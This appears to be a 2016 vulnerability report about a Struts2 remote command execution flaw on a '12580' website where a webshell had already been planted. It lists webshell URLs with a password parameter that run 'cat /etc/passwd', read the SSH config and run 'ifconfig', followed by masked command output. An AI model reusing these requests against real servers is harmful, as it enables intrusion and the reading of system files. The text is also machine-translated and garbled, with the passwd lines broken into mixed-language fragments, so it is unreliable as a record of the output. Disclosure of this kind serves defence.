漏洞标题 12580一个站命令执行已被shell内在网络渗透 相关制造商 12580 漏洞作者 重复 提交时间 2016-05-09 23: 10 公共时间 2016-06-26 17: 00 漏洞类型 命令执行 危险等级 高 自我评估等级 11 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 Webshell,补丁不及时,struts,远程命令执行,第三方框架 漏洞详细信息 1.http://**。**。**/GetHotelListAction!initc.do str2命令执行漏洞_ ********** Failure when receiving data from the peer 3.http://**。**。**/12580.jsppwd=0324& i=cat%20/etc/ssh/ssh_config_ ********** ***** dd8b05eb8a75c124cb.png“***** ********** ********** 4.http://**。**。**/12580.jsppwd=0324& i=cat%20/etc/passwd_ ********** ********** *****:/root:/***** ***** bin:/sbi ***** *****:/sbin:/sb ***** ***** r/adm:/sb ***** ***** ool/lpd:/s ***** *****:/sbin:/***** ***** wn:/sbin:/s ***** *****:/sbin:/***** *****/spool/mail下***** ***** spool/uucp:/***** ***** tor:/root:/***** *****/usr/games: ***** ***** var/gopher:/***** *****/var/ftp:/s ***** ***** body: /:/s ***** ***** sage bus: /:/***** *****在/var /缓存/RPC ***** *****内存拥有者:/d ***** ***** c/abrt:/sb ***** ***** r':/var/empty/***** *****池/后缀***** *****守护进程: /:/***** *****/ntp:/sbi ***** ***** ck:/var/run/avahi - ***** *****用户:/var/lib ***** ***** NFS用户:/var/li ***** ***** d SSH:/var/empty ***** *****: /:/sbi ***** *****由OProfile使用:/***** *****家用/tomca ***** ***** home/yz: ***** ***** ome/www:/***** ***** /家庭/logu ***** ********** ********** 5.http://**。**。**/12580.jsppwd=0324& i=ifconfig执行ifconfig_ ***** Failure when receiving data from the peer